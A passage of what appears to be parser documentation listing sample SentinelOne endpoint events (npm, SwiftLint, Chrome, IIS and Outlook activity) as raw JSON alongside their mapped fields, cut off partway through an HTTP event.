-=== "file_deletion_linux.json" - - ```json - - { - "message": "{\"meta\":{\"uuid\":\"185f2b1e-bdca-c6e2-91b0-520df717d799\",\"traceId\":\"01GBM84F2S5AZQSP200MBDS22Q\",\"agentVersion\":\"S1-LIN/22.2.2.2\",\"osFamily\":\"linux\",\"osName\":\"Linux\",\"osRevision\":\"Amazon 2 4.14.246-187.474.amzn2.x86_64\",\"computerName\":\"ip-1-1-1-1.eu-west-1.compute.internal\",\"machineType\":\"server\",\"mgmtUrl\":\"https://euce1-103.sentinelone.net\"},\"timestamp\":{\"millisecondsSinceEpoch\":\"1661758224333\"},\"event_type\":\"fileModification\",\"trueContext\":{\"key\":{\"value\":\"0f4c8c9c-7440-2977-64af-11505a86f00d\"}},\"source\":{\"node\":{\"key\":{\"value\":\"0f4ca868-3233-c901-c895-a9716d0c7a59\"}},\"executable\":{\"node\":{\"key\":{\"value\":\"0f4ca59e-5ecc-2161-c4e7-97ac79e4c629\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1630345715000\"},\"path\":\"/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/usr/local/bin/node\",\"pUnix\":\"0\",\"owner\":{},\"sizeBytes\":\"48935408\",\"signature\":{\"unsigned\":{}},\"isKernelModule\":\"E_FALSE\",\"hashes\":{\"sha1\":\"837e6fbd33802ec0d56ac1bb3754af0046c9a220\"},\"fileLocation\":\"Local\"},\"commandLine\":\" node /usr/local/bin/npm install\",\"fullPid\":{\"pid\":12322,\"startTime\":{\"millisecondsSinceEpoch\":\"1661758222250\"}},\"user\":{\"name\":\"root\",\"sid\":\"3397\"},\"interactive\":\"E_FALSE\",\"parent\":{\"node\":{\"key\":{\"value\":\"0f4ca51a-f789-1621-a626-2b1b1c4a93f0\"}},\"fullPid\":{\"startTime\":{}}},\"excluded\":\"E_FALSE\",\"name\":\"node\",\"root\":\"E_FALSE\",\"isWow64\":\"E_FALSE\",\"isRedirectedCommandProcessor\":\"E_FALSE\",\"trueContext\":{\"key\":{\"value\":\"0f4c8c9c-7440-2977-64af-11505a86f00d\"}},\"counters\":{\"fileCreation\":537,\"fileDeletion\":272,\"fileModification\":545,\"netConnOut\":10}},\"file\":{\"node\":{\"key\":{\"value\":\"0f4d14d9-ce0f-85db-b8b9-0b942faf064b\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1661758119966\"},\"path\":\"/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/root/.npm/_cacache/index-v5/3c/ec/2c605585502b25aa623d9f0b23d9c5fdc4cd06218943b79686e4c58f953f\",\"pUnix\":\"0\",\"owner\":{},\"sizeBytes\":\"1347\",\"signature\":{\"unsigned\":{}},\"isKernelModule\":\"E_FALSE\",\"hashes\":{},\"fileLocation\":\"Local\"},\"sizeBytes\":\"1347\",\"isKernelModule\":\"E_FALSE\",\"hashes\":{},\"oldHashes\":{\"sha1\":\"da39a3ee5e6b4b0d3255bfef95601890afd80709\"}}\n\n", - "event": { - "action": "fileModification", - "start": "2022-08-29T07:30:24.333000Z" - }, - "agent": { - "version": "S1-LIN/22.2.2.2" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-103.sentinelone.net", - "trace_id": "01GBM84F2S5AZQSP200MBDS22Q", - "uuid": "185f2b1e-bdca-c6e2-91b0-520df717d799" - }, - "event": { - "type": "fileModification" - }, - "file": { - "is_kernel_module": false, - "location": "Local" - }, - "host": { - "os": { - "revision": "Amazon 2 4.14.246-187.474.amzn2.x86_64" - } - }, - "process": { - "counters": { - "file_creation": 537, - "file_deletion": 272, - "file_modification": 545, - "net_conn_out": 10 - }, - "excluded": "E_FALSE", - "executable": { - "name": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/usr/local/bin/node", - "node": { - "key": "0f4ca59e-5ecc-2161-c4e7-97ac79e4c629" - }, - "size_bytes": "48935408", - "start": "2021-08-30T17:48:35.000000Z" - }, - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "0f4ca868-3233-c901-c895-a9716d0c7a59" - }, - "parent": { - "node": { - "key": "0f4ca51a-f789-1621-a626-2b1b1c4a93f0" - } - }, - "root": "E_FALSE", - "true_context": { - "key": "0f4c8c9c-7440-2977-64af-11505a86f00d" - }, - "user": { - "sid": "3397" - } - }, - "true_context": { - "key": "0f4c8c9c-7440-2977-64af-11505a86f00d" - } - }, - "file": { - "created": "2022-08-29T07:28:39.966000Z", - "directory": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/root/.npm/_cacache/index-v5/3c/ec", - "name": "2c605585502b25aa623d9f0b23d9c5fdc4cd06218943b79686e4c58f953f", - "path": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/root/.npm/_cacache/index-v5/3c/ec/2c605585502b25aa623d9f0b23d9c5fdc4cd06218943b79686e4c58f953f", - "size": 1347, - "type": "dir" - }, - "host": { - "name": "ip-1-1-1-1.eu-west-1.compute.internal", - "os": { - "family": "linux", - "name": "Linux" - }, - "type": "server" - }, - "process": { - "command_line": " node /usr/local/bin/npm install", - "executable": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/usr/local/bin/node", - "hash": { - "sha1": "837e6fbd33802ec0d56ac1bb3754af0046c9a220" - }, - "name": "node", - "pid": 12322, - "start": "2022-08-29T07:30:22.250000Z", - "title": "node" - }, - "related": { - "hash": [ - "837e6fbd33802ec0d56ac1bb3754af0046c9a220" - ], - "user": [ - "root" - ] - }, - "user": { - "id": "3397", - "name": "root" - } - } - - ``` - - -=== "file_deletion_osx.json" - - ```json - - { - "message": "{\"meta\":{\"uuid\":\"81A8A777-22BD-5CF8-9BF1-FD05875D9CD5\",\"traceId\":\"D9E5C5D4-33D7-43E1-AF54-4C70A938643D_1\",\"agentVersion\":\"S1-MAC/22.2.3.6268\",\"osFamily\":\"osx\",\"osName\":\"OS X\",\"osRevision\":\"12.5.1 (21G83)\",\"computerName\":\"MAC12345678\",\"machineType\":\"laptop\",\"mgmtUrl\":\"https://euce1-103.sentinelone.net\"},\"timestamp\":{\"millisecondsSinceEpoch\":\"1661503902148\"},\"event_type\":\"fileDeletion\",\"trueContext\":{\"key\":{\"value\":\"DD4C9404-F0D8-4676-84A6-5AAE17DE60ED\"}},\"source\":{\"node\":{\"key\":{\"value\":\"27902FA0-0C08-475E-81CA-26A092441368\"}},\"executable\":{\"node\":{\"key\":{\"value\":\"1BF67724-45F1-4B37-AE75-33B8E8CB8717\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1658821170000\"},\"path\":\"/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint\",\"pUnix\":\"493\",\"owner\":{\"name\":\"user.name\"},\"sizeBytes\":\"61090952\",\"signature\":{\"unsigned\":{}},\"isKernelModule\":\"E_FALSE\",\"hashes\":{\"sha1\":\"88bd62f8a3ee159d4f4611b324073d1e56ef76de\",\"sha256\":\"03298adf7dae5700891033ddeabecea7f5850fedefadfa9fa6ba389a38ba354f\",\"md5\":\"7180a848026de2bef01fb7383bd03ba0\"},\"fileLocation\":\"Local\"},\"commandLine\":\"/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint lint --in-process-sourcekit --config /Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/plugins/Styleguide.output/Styleguide/SwiftLintPlugin/swiftlint.yml /Users/user.name/Documents/Development/djij/djij_design_system_ios/Styleguide\",\"fullPid\":{\"pid\":6933,\"startTime\":{\"millisecondsSinceEpoch\":\"1661503902034\"}},\"user\":{\"name\":\"user.name\"},\"interactive\":\"E_FALSE\",\"parent\":{\"node\":{\"key\":{\"value\":\"79B3CD05-F827-45CB-A898-B647D8409A3D\"}},\"fullPid\":{\"startTime\":{}}},\"excluded\":\"E_FALSE\",\"name\":\"swiftlint\",\"root\":\"E_FALSE\",\"isWow64\":\"E_FALSE\",\"isRedirectedCommandProcessor\":\"E_FALSE\",\"trueContext\":{\"key\":{\"value\":\"DD4C9404-F0D8-4676-84A6-5AAE17DE60ED\"}}},\"targetFile\":{\"node\":{\"key\":{\"value\":\"024A7D89-2663-48AF-9DF4-C95494454E37\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1661503902152\"},\"path\":\"/private/var/folders/0p/64nt8k313tl8klsphkkcmcjm2rrkq9/T/TemporaryItems/NSIRD_swiftlint_sBHQwy/ff558ca8ac21977f6850e3a3a719ed4f.plist\",\"owner\":{},\"isKernelModule\":\"E_FALSE\",\"hashes\":{}}}\n\n", - "event": { - "action": "fileDeletion", - "start": "2022-08-26T08:51:42.148000Z" - }, - "agent": { - "version": "S1-MAC/22.2.3.6268" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-103.sentinelone.net", - "trace_id": "D9E5C5D4-33D7-43E1-AF54-4C70A938643D_1", - "uuid": "81A8A777-22BD-5CF8-9BF1-FD05875D9CD5" - }, - "event": { - "type": "fileDeletion" - }, - "file": { - "node": { - "key": "024A7D89-2663-48AF-9DF4-C95494454E37" - } - }, - "host": { - "os": { - "revision": "12.5.1 (21G83)" - } - }, - "process": { - "excluded": "E_FALSE", - "executable": { - "name": "/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint", - "node": { - "key": "1BF67724-45F1-4B37-AE75-33B8E8CB8717" - }, - "size_bytes": "61090952", - "start": "2022-07-26T07:39:30.000000Z" - }, - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "27902FA0-0C08-475E-81CA-26A092441368" - }, - "parent": { - "node": { - "key": "79B3CD05-F827-45CB-A898-B647D8409A3D" - } - }, - "root": "E_FALSE", - "true_context": { - "key": "DD4C9404-F0D8-4676-84A6-5AAE17DE60ED" - } - }, - "true_context": { - "key": "DD4C9404-F0D8-4676-84A6-5AAE17DE60ED" - } - }, - "file": { - "created": "2022-08-26T08:51:42.152000Z", - "directory": "/private/var/folders/0p/64nt8k313tl8klsphkkcmcjm2rrkq9/T/TemporaryItems/NSIRD_swiftlint_sBHQwy", - "name": "ff558ca8ac21977f6850e3a3a719ed4f.plist", - "path": "/private/var/folders/0p/64nt8k313tl8klsphkkcmcjm2rrkq9/T/TemporaryItems/NSIRD_swiftlint_sBHQwy/ff558ca8ac21977f6850e3a3a719ed4f.plist" - }, - "host": { - "name": "MAC12345678", - "os": { - "family": "osx", - "name": "OS X" - }, - "type": "laptop" - }, - "process": { - "command_line": "/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint lint --in-process-sourcekit --config /Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/plugins/Styleguide.output/Styleguide/SwiftLintPlugin/swiftlint.yml /Users/user.name/Documents/Development/djij/djij_design_system_ios/Styleguide", - "executable": "/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint", - "hash": { - "md5": "7180a848026de2bef01fb7383bd03ba0", - "sha1": "88bd62f8a3ee159d4f4611b324073d1e56ef76de", - "sha256": "03298adf7dae5700891033ddeabecea7f5850fedefadfa9fa6ba389a38ba354f" - }, - "name": "swiftlint", - "pid": 6933, - "start": "2022-08-26T08:51:42.034000Z", - "title": "swiftlint" - }, - "related": { - "hash": [ - "03298adf7dae5700891033ddeabecea7f5850fedefadfa9fa6ba389a38ba354f", - "7180a848026de2bef01fb7383bd03ba0", - "88bd62f8a3ee159d4f4611b324073d1e56ef76de" - ], - "user": [ - "user.name" - ] - }, - "user": { - "name": "user.name" - } - } - - ``` - - -=== "file_modification.json" - - ```json - - { - "message": "{\"meta\": {\"uuid\": \"f63008e522ce40c9afd4348634b5ab3b\", \"traceId\": \"01FFJC477DKY75XNH1KZPNVR44\", \"agentVersion\": \"S1-WIN/21.7.1.240\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH20\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631630506789\"}, \"event_type\": \"fileModification\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"B3B1945F1C32FBE0\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"05893E5943D0005C\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1630573198477\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2465624\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"a82705f4f5d1408f7c14d16a9cbe26c509422b29\", \"sha256\": \"07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff\", \"md5\": \"a766188d75e570ea3f9b09fb9d82cb54\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:8\", \"fullPid\": {\"pid\": 17924, \"startTime\": {\"millisecondsSinceEpoch\": \"1631516877934\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"0D7A69B0C2C26E73\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"counters\": {\"moduleLoad\": 237, \"fileCreation\": 15609, \"fileDeletion\": 10968, \"fileModification\": 25519, \"netConnOut\": 7312, \"dnsLookups\": 5131}}, \"file\": {\"node\": {\"key\": {\"value\": \"11B30D7B6C017731\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1631630506782\"}, \"path\": \"C:\\\\Users\\\\user.name.CORP\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\TransportSecurity\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"hashes\": {}, \"fileLocation\": \"Local\"}, \"isKernelModule\": \"E_FALSE\", \"hashes\": {}, \"oldHashes\": {}}", - "event": { - "action": "fileModification", - "start": "2021-09-14T14:41:46.789000Z" - }, - "agent": { - "version": "S1-WIN/21.7.1.240" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "trace_id": "01FFJC477DKY75XNH1KZPNVR44", - "uuid": "f63008e522ce40c9afd4348634b5ab3b" - }, - "event": { - "type": "fileModification" - }, - "file": { - "is_kernel_module": false, - "location": "Local" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "dns_lookups": 5131, - "file_creation": 15609, - "file_deletion": 10968, - "file_modification": 25519, - "module_load": 237, - "net_conn_out": 7312 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "05893E5943D0005C" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2465624", - "start": "2021-09-02T08:59:58.477000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "B3B1945F1C32FBE0" - }, - "parent": { - "node": { - "key": "0D7A69B0C2C26E73" - } - }, - "root": "E_FALSE", - "session_id": 1, - "true_context": { - "key": "6B188EE5E8C5F24F" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - }, - "true_context": { - "key": "6B188EE5E8C5F24F" - } - }, - "file": { - "created": "2021-09-14T14:41:46.782000Z", - "extension": "CORP\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity", - "name": "TransportSecurity", - "path": "C:\\Users\\user.name.CORP\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" - }, - "host": { - "name": "LAPTOP-TECH20", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:8", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "hash": { - "md5": "a766188d75e570ea3f9b09fb9d82cb54", - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff" - }, - "name": "chrome.exe", - "pid": 17924, - "start": "2021-09-13T07:07:57.934000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "hash": [ - "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "a766188d75e570ea3f9b09fb9d82cb54", - "a82705f4f5d1408f7c14d16a9cbe26c509422b29" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6187", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "file_modification2.json" - - ```json - - { - "message": "{\"meta\":{\"uuid\":\"123\",\"traceId\":\"123\",\"agentVersion\":\"S1-WIN/21.7.7.40005\",\"osFamily\":\"windows\",\"osName\":\"Windows Server 2019 Datacenter\",\"osRevision\":\"17763\",\"computerName\":\"123\",\"machineType\":\"server\",\"mgmtUrl\":\"https://foo.sentinelone.net\"},\"timestamp\":{\"millisecondsSinceEpoch\":\"1660727671759\"},\"event_type\":\"fileModification\",\"trueContext\":{\"key\":{\"value\":\"07CF4F73FE08319F\"}},\"source\":{\"node\":{\"key\":{\"value\":\"AB20B9FDBC53D9F5\"}},\"executable\":{\"node\":{\"key\":{\"value\":\"5B336EB7F6C58E57\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"18446732429235951616\"},\"path\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\"owner\":{},\"isDir\":\"E_FALSE\",\"sizeBytes\":\"26624\",\"signature\":{\"signed\":{\"identity\":\"MICROSOFT WINDOWS\",\"valid\":{}}},\"hashes\":{\"sha1\":\"447ec979c4b2c53c21b17bd9c2f7d67a9f967108\",\"sha256\":\"1eb51ea7407f41bc212cc699e37727ad6e6d52ec6746119ea066bd901f5e143b\",\"md5\":\"0406e327338ccea5ef7dcf58268a8bfe\"},\"fileLocation\":\"Local\"},\"commandLine\":\"c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe -ap \\\"STATISTIQUES\\\" -v \\\"v4.0\\\" -l \\\"webengine4.dll\\\" -a \\\\\\\\.\\\\pipe\\\\iisipm21bdf632-40c6-4b01-aa13-238d4c12d066 -h \\\"C:\\\\inetpub\\\\temp\\\\apppools\\\\STATISTIQUES\\\\STATISTIQUES.config\\\" -w \\\"\\\" -m 0 -t 20 -ta 0\",\"fullPid\":{\"pid\":3748,\"startTime\":{\"millisecondsSinceEpoch\":\"1660716764710\"}},\"user\":{\"name\":\"123\\\\foo.statistiques\",\"sid\":\"S-1-5-21-4154652123-1702891081-745747720-13627\"},\"interactive\":\"E_FALSE\",\"parent\":{\"node\":{\"key\":{\"value\":\"38A3CC9C5229D1BD\"}},\"fullPid\":{\"startTime\":{}}},\"excluded\":\"E_FALSE\",\"name\":\"IIS Worker Process\",\"root\":\"E_TRUE\",\"subsystem\":\"SYS_WIN32\",\"integrityLevel\":\"HIGH\",\"isWow64\":\"E_FALSE\",\"isRedirectedCommandProcessor\":\"E_FALSE\",\"trueContext\":{\"key\":{\"value\":\"07CF4F73FE08319F\"}},\"counters\":{\"moduleLoad\":5585,\"fileCreation\":1960,\"fileDeletion\":34,\"fileModification\":4055,\"netConnOut\":96,\"dnsLookups\":72}},\"file\":{\"node\":{\"key\":{\"value\":\"CA4F23B11D816C71\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1660727671758\"},\"path\":\"Anonymized Data\",\"owner\":{},\"isDir\":\"E_FALSE\",\"sizeBytes\":\"1075\",\"hashes\":{\"sha1\":\"9045966e5e375754d7789d487996d0314b5f77e1\",\"sha256\":\"28cd1440f5b4f5c0d7cdbfbe4a02254cda1a87fbdddf3145faa4d5282d013f1d\",\"md5\":\"2e63349a674acda41d8e1dcbff91b209\"},\"fileLocation\":\"Local\"},\"sizeBytes\":\"1075\",\"isKernelModule\":\"E_FALSE\",\"hashes\":{},\"oldHashes\":{}}\n", - "event": { - "action": "fileModification", - "start": "2022-08-17T09:14:31.759000Z" - }, - "agent": { - "version": "S1-WIN/21.7.7.40005" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://foo.sentinelone.net", - "trace_id": "123", - "uuid": "123" - }, - "event": { - "type": "fileModification" - }, - "file": { - "is_kernel_module": false, - "location": "Local" - }, - "host": { - "os": { - "revision": "17763" - } - }, - "process": { - "counters": { - "dns_lookups": 72, - "file_creation": 1960, - "file_deletion": 34, - "file_modification": 4055, - "module_load": 5585, - "net_conn_out": 96 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", - "node": { - "key": "5B336EB7F6C58E57" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "26624", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "HIGH", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "AB20B9FDBC53D9F5" - }, - "parent": { - "node": { - "key": "38A3CC9C5229D1BD" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "07CF4F73FE08319F" - }, - "user": { - "sid": "S-1-5-21-4154652123-1702891081-745747720-13627" - } - }, - "true_context": { - "key": "07CF4F73FE08319F" - } - }, - "file": { - "created": "2022-08-17T09:14:31.758000Z", - "extension": "Anonymized Data", - "hash": { - "md5": "2e63349a674acda41d8e1dcbff91b209", - "sha1": "9045966e5e375754d7789d487996d0314b5f77e1", - "sha256": "28cd1440f5b4f5c0d7cdbfbe4a02254cda1a87fbdddf3145faa4d5282d013f1d" - }, - "name": "Anonymized Data", - "path": "Anonymized Data", - "size": 1075 - }, - "host": { - "name": "123", - "os": { - "family": "windows", - "name": "Windows Server 2019 Datacenter" - }, - "type": "server" - }, - "process": { - "command_line": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"STATISTIQUES\" -v \"v4.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm21bdf632-40c6-4b01-aa13-238d4c12d066 -h \"C:\\inetpub\\temp\\apppools\\STATISTIQUES\\STATISTIQUES.config\" -w \"\" -m 0 -t 20 -ta 0", - "executable": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", - "hash": { - "md5": "0406e327338ccea5ef7dcf58268a8bfe", - "sha1": "447ec979c4b2c53c21b17bd9c2f7d67a9f967108", - "sha256": "1eb51ea7407f41bc212cc699e37727ad6e6d52ec6746119ea066bd901f5e143b" - }, - "name": "w3wp.exe", - "pid": 3748, - "start": "2022-08-17T06:12:44.710000Z", - "title": "IIS Worker Process", - "working_directory": "C:\\Windows\\System32\\inetsrv" - }, - "related": { - "hash": [ - "0406e327338ccea5ef7dcf58268a8bfe", - "1eb51ea7407f41bc212cc699e37727ad6e6d52ec6746119ea066bd901f5e143b", - "28cd1440f5b4f5c0d7cdbfbe4a02254cda1a87fbdddf3145faa4d5282d013f1d", - "2e63349a674acda41d8e1dcbff91b209", - "447ec979c4b2c53c21b17bd9c2f7d67a9f967108", - "9045966e5e375754d7789d487996d0314b5f77e1" - ], - "user": [ - "123\\foo.statistiques" - ] - }, - "user": { - "id": "S-1-5-21-4154652123-1702891081-745747720-13627", - "name": "123\\foo.statistiques" - } - } - - ``` - - -=== "http.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 1, \"uuid\": \"3d923fd8f09b44f4973579043a3c8df3\", \"traceId\": \"33AEAAEA73CD4989976C65DA8123C361\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19043\", \"computerName\": \"LAPTOP-TECH10\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631784929904\"}, \"event_type\": \"http\", \"trueContext\": {\"key\": {\"value\": \"A1FFB5A30161CDC0\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"28C500988B415CA1\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"96C577BBA6378545\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\OUTLOOK.EXE\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"42156856\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT CORPORATION\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"676b4e6a3c2c06fd7df3b83527a5570fd6687c8f\", \"sha256\": \"97564d2938bebaaf1741fe5f675366cf1d8d3b6328fe38a5cf8e7133fe533ed1\", \"md5\": \"bafa8a3a020648b57622e0b79104468a\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\OUTLOOK.EXE\\\"\", \"fullPid\": {\"pid\": 14144, \"startTime\": {\"millisecondsSinceEpoch\": \"1631775730819\"}}, \"user\": {\"name\": \"CORP\\\\m.benyounes\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6195\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"8299EFA6DE45855B\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Microsoft Outlook\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"A1FFB5A30161CDC0\"}}, \"counters\": {\"modelChildProcess\": 4, \"osChildProcess\": 2, \"moduleLoad\": 4102, \"fileCreation\": 522, \"fileDeletion\": 441, \"fileModification\": 1211, \"netConnOut\": 235, \"registryModification\": 7596, \"dnsLookups\": 81}}, \"sourceType\": \"WININET\", \"url\": \"https://automation.alticap.com/media/images/1548943185788.jpg?foo=bar#frag\", \"method\": \"GET\"}", - "event": { - "action": "http", - "start": "2021-09-16T09:35:29.904000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 1, - "trace_id": "33AEAAEA73CD4989976C65DA8123C361", - "uuid": "3d923fd8f09b44f4973579043a3c8df3" - }, - "event": { - "type": "http" - }, - "host": { - "os": { - "revision": "19043" - } - }, - "process": { - "counters": { - "dns_lookups": 81, - "file_creation": 522, - "file_deletion": 441, - "file_modification": 1211, - "model_child_process": 4, - "module_load": 4102, - "net_conn_out": 235, - "os_child_process": 2, - "registry_modification": 7596 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", - "node": { - "key": "96C577BBA6378545" - }, - "signature": { - "signed": { - "identity": "MICROSOFT CORPORATION" - } - }, - "size_bytes": "42156856", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": 